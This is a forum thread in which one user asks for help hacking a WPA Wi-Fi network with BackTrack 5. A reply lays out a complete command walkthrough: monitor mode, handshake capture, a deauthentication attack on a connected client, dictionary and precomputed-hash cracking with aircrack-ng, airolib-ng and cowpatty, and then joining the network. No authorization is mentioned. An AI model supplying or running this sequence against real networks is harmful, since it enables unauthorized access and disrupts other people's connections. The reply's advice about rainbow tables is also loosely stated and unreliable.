Go Back   TechArena Community > Software > Operating Systems
Become a Member!
Forgot your username/password?
Tags Active Topics RSS Search Mark Forums Read

Reply
 
Thread Tools Search this Thread
  #1  
Old 20-03-2012
Member
 
Join Date: Mar 2012
Posts: 4
sad aircrack in backtrack

i m trying to hack wpa using backtrack 5.
it starts with "airmon-ng start wlan0"
"airodump-ng mon0"
"airodump-ng -c 6 bssid 00:11:22:33:44:55 -w data mon0"
its working fine till now but whenever i run the cmd "aireplay-ng --deauth 1 - 00:11:22:33:44:55 -c E4:B0:21:1B:12:86 mon0" , it says 'mon0 is on channel 5, but the AP uses channel 1'
it is giving me same error everytime i repeat the process help plzzzzzz
Reply With Quote
  #2  
Old 21-03-2012
Member
 
Join Date: Dec 2007
Posts: 2,273
Re: aircrack in backtrack

There are several types of WPA dictionary list out there, but I highly recommend using rainbow-tables which can be several Gigs in size.

Code:
airmon-ng start wlan0
airodump-ng mon0

airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt

airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack -r crackwpa output-01.cap

cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt

genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash

wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
ping 192.168.1.1
Reply With Quote
Reply

  TechArena Community > Software > Operating Systems
Tags: , , , ,



Thread Tools Search this Thread
Search this Thread:

Advanced Search


Similar Threads for: "aircrack in backtrack"
Thread Thread Starter Forum Replies Last Post
Backtrack kantu Operating Systems 1 29-09-2011 12:28 PM
How to upgrade from Backtrack 4 to Backtrack 5 Upendra Operating Systems 6 09-07-2011 08:52 PM
Crack a WEP / WPA key with Aircrack-ng suite The#Danger Tips & Tweaks 4 07-12-2010 07:19 AM
Installing aircrack-ng on ubuntu Captain Carrot Windows Software 7 11-05-2010 10:17 AM
Backtrack 4 VMware help Devabrata Operating Systems 6 09-05-2010 12:25 AM


All times are GMT +5.5. The time now is 11:09 AM.